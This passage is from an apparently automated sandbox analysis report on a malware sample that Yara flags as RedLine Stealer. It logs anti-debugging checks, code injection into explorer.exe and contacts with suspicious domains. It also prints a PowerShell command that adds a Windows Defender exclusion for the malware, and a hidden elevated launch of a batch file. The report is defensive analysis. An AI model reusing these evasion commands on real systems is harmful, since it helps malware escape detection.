Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D241AA0 mov eax, dword ptr fs:[00000030h] 23_2_6D241AA0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D275AA0 mov eax, dword ptr fs:[00000030h] 23_2_6D275AA0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D275AA0 mov eax, dword ptr fs:[00000030h] 23_2_6D275AA0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25AAB0 mov eax, dword ptr fs:[00000030h] 23_2_6D25AAB0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25AAB0 mov eax, dword ptr fs:[00000030h] 23_2_6D25AAB0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2712BD mov esi, dword ptr fs:[00000030h] 23_2_6D2712BD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2712BD mov eax, dword ptr fs:[00000030h] 23_2_6D2712BD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2712BD mov eax, dword ptr fs:[00000030h] 23_2_6D2712BD
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27DA88 mov eax, dword ptr fs:[00000030h] 23_2_6D27DA88
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27DA88 mov eax, dword ptr fs:[00000030h] 23_2_6D27DA88
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27D294 mov eax, dword ptr fs:[00000030h] 23_2_6D27D294
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27D294 mov eax, dword ptr fs:[00000030h] 23_2_6D27D294
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D272AE4 mov eax, dword ptr fs:[00000030h] 23_2_6D272AE4
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304AEF mov eax, dword ptr fs:[00000030h] 23_2_6D304AEF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245AC0 mov eax, dword ptr fs:[00000030h] 23_2_6D245AC0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245AC0 mov eax, dword ptr fs:[00000030h] 23_2_6D245AC0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D245AC0 mov eax, dword ptr fs:[00000030h] 23_2_6D245AC0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D318ADD mov eax, dword ptr fs:[00000030h] 23_2_6D318ADD
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Process queried: DebugObjectHandle Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 0_2_0041A050 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A050
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D276B90 rdtsc 23_2_6D276B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Code function: 13_1_00402679 LdrLoadDll, 13_1_00402679
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 0_2_0041A050 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A050
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 0_2_0041FF10 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041FF10

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: nalirou70.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: host-host-file6.com
Source: C:\Windows\explorer.exe Domain query: hajezey10.top
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou7000.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 610B.exe.5.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\hrgjvbv Memory written: C:\Users\user\AppData\Roaming\hrgjvbv base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Memory written: C:\Users\user\AppData\Local\Temp\8039.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Roaming\hrgjvbv Code function: 10_2_02BD0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 10_2_02BD0110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Thread created: C:\Windows\explorer.exe EIP: 44C1920 Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Thread created: unknown EIP: 4E41920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Thread created: unknown EIP: 44E1920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Thread created: unknown EIP: 4F819C0 Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\B8B0.exe" -Force
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\B8B0.exe" -Force Jump to behavior
.NET source code references suspicious native API functions
Source: 82DC.exe.5.dr, Discrepant.Annotations/SchemaAnnotation.cs Reference to suspicious API methods: ('ComputeState', 'LoadLibrary@kernel32.dll'), ('DisableState', 'GetProcAddress@kernel32')
Source: 19.2.59B4.exe.40000.0.unpack, bY6SuEh351L7GYyy67/NuxyqR8Fr0rqvtxOeE.cs Reference to suspicious API methods: ('vaLfadLlgO', 'LoadLibrary@kernel32'), ('VtUfgiaft7', 'GetProcAddress@kernel32')
Source: 19.2.59B4.exe.40000.0.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.8039.exe.400000.8.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.8039.exe.400000.12.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.8039.exe.400000.10.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.8039.exe.400000.4.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.8039.exe.400000.6.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.2.8039.exe.400000.0.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe" /EXEFilename "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe" /EXEFilename "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Process created: C:\Users\user\Desktop\y4oMrtO1Mt.exe "C:\Users\user\Desktop\y4oMrtO1Mt.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\hrgjvbv Process created: C:\Users\user\AppData\Roaming\hrgjvbv C:\Users\user\AppData\Roaming\hrgjvbv Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F72D.exe Process created: C:\Users\user\AppData\Local\Temp\F72D.exe C:\Users\user\AppData\Local\Temp\F72D.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Process created: C:\Users\user\AppData\Local\Temp\8039.exe C:\Users\user\AppData\Local\Temp\8039.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe" /EXEFilename "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\B8B0.exe" -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Process created: C:\Users\user\AppData\Local\Temp\610B.exe C:\Users\user\AppData\Local\Temp\610B.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe "C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe" /SpecialRun 4101d8 3544
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\e8e330fa-11c2-45cb-b375-131a4522ce18\AdvancedRun.exe Code function: 28_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 28_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D27E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap, 23_2_6D27E730
Source: explorer.exe, 00000005.00000000.687463087.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.700234106.0000000001080000.00000002.00020000.sdmp, 59B4.exe, 00000013.00000002.959255251.0000000001410000.00000002.00020000.sdmp, 610B.exe, 0000001B.00000002.943758825.0000000000B60000.00000002.00020000.sdmp, argjvbv, 00000020.00000002.957239544.0000000000D40000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.700234106.0000000001080000.00000002.00020000.sdmp, 59B4.exe, 00000013.00000002.959255251.0000000001410000.00000002.00020000.sdmp, 610B.exe, 0000001B.00000002.943758825.0000000000B60000.00000002.00020000.sdmp, argjvbv, 00000020.00000002.957239544.0000000000D40000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.700234106.0000000001080000.00000002.00020000.sdmp, 59B4.exe, 00000013.00000002.959255251.0000000001410000.00000002.00020000.sdmp, 610B.exe, 0000001B.00000002.943758825.0000000000B60000.00000002.00020000.sdmp, argjvbv, 00000020.00000002.957239544.0000000000D40000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.700234106.0000000001080000.00000002.00020000.sdmp, 59B4.exe, 00000013.00000002.959255251.0000000001410000.00000002.00020000.sdmp, 610B.exe, 0000001B.00000002.943758825.0000000000B60000.00000002.00020000.sdmp, argjvbv, 00000020.00000002.957239544.0000000000D40000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.706261593.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Users\user\AppData\Local\Temp\8039.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Users\user\AppData\Local\Temp\8039.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8039.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Queries volume information: C:\Users\user\AppData\Local\Temp\B8B0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B8B0.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\610B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\82DC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\82DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\y4oMrtO1Mt.exe Code function: 0_2_0041B4E0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_0041B4E0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2465A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 23_2_6D2465A0

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 27.2.610B.exe.36b5530.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.82DC.exe.3f36280.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2600000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2050000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36b6418.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.82DC.exe.3f36280.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36b5530.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.8039.exe.4743790.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36b6418.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36d0f50.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2600000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2050000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.8039.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.8039.exe.4729678.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2050ee8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.2050ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.8039.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.8039.exe.4729678.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.21c0f6e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.21c0086.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.21c0f6e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.21c0086.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.610B.exe.36d0f50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.954434043.00000000036B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.851440177.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.946993376.0000000002180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.941479001.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.917443337.0000000000720000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.860279815.00000000046F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.850675155.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.857126513.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.846233118.000000000115D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.853234726.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.950530750.0000000002600000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.946243879.0000000002050000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.948562304.0000000003EEF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8039.exe PID: 6032, type: MEMORYSTR
